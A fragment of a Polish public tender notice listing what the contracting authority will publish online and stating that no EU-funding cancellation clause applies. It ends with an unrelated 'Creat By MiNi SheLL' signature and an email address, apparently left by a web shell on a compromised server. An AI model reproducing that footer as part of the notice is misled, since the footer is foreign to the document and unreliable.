4. Zamawiający na swojej stronie internetowej będzie publikował zawiadomienia oraz informacje związane z prowadzonym postępowaniem, w tym zwłaszcza:
1) zapytania Wykonawców dotyczące treści SIWZ oraz odpowiedzi Zamawiającego;
2) modyfikacje treści SIWZ;
3) informacje o przedłużeniu terminu składania i otwarcia ofert;
4) zawiadomienie o wyborze najkorzystniejszej oferty;
5) informacje o odwołaniu dotyczącym treści ogłoszenia o zamówieniu lub postanowień SIWZ;
6) zawiadomienie o unieważnieniu postępowania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com